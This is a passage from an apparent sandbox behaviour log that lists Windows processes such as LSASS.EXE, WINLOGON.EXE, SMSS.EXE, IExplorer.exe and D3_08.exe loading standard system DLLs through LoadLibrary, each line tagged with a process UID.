kernel32.dll (UID: 00000000-00005808)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005808)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005808)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005808)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005808)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005808)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005808)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005808)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005808)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005808)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005284)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005284)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005284)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005284)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005284)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005284)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005284)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005284)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005284)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000908)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000908)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000908)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000908)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00000908)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00000908)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00000908)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00000908)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00000908)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00000908)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00000908)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005432)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005432)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005432)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005432)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005432)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005432)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005432)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005432)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005432)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005232)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005232)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005232)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005232)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005232)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005232)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005232)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005232)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005232)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005232)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003448)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003448)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003448)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003448)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00003448)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00003448)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003448)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00003448)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00003448)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003448)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00003448)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003448)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00003448)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003448)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002104)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002104)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002104)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002104)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002104)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002104)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002104)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002104)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002104)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004752)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004752)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004752)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004752)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004752)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004752)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004752)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004752)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004752)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004752)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004752)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005636)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005636)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005636)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005636)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005636)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005636)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005636)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005636)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005636)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001456)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001456)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001456)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001456)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00001456)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00001456)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00001456)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001456)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001456)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00001456)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005520)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005520)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005520)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005520)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005520)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005520)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005520)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005520)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005520)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005520)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001288)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001288)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001288)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001288)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00001288)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00001288)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00001288)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001288)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001288)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006012)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006012)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006012)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006012)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00006012)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00006012)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00006012)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006012)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006012)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005836)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005836)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005836)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005836)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005836)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005836)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005836)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005836)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005836)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005836)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005072)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005072)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005072)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005072)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005072)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005072)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005072)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005072)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005072)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005072)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005072)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005072)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005072)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005072)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005072)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005072)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005072)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005756)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005756)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005756)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005756)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005700)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005700)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005700)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005700)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005700)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006092)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006092)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006092)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006092)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00006092)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00006092)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00006092)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006092)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006092)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00006092)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003240)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003240)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003240)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003240)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003240)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003240)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003240)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003240)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003240)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003240)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005192)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005192)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005192)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005192)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005192)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005192)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005192)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005192)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005192)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005192)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005192)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004924)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004924)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004924)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004924)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004924)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005728)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005728)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005728)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005728)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005728)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005728)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005728)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005728)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005728)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005728)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004588)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004588)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004588)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004588)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004588)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005644)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005644)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005644)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005644)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005644)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005644)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005644)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005644)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005644)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005644)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003984)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003984)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003984)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003984)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003984)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003984)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003984)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003984)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003984)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003652)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003652)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003652)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003652)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003652)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003652)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003652)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003652)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004136)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004136)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004136)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004136)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004136)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004136)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005688)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005688)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005688)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005688)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005688)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005688)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003376)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003376)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002668)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002668)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002668)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002668)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002668)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002668)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter 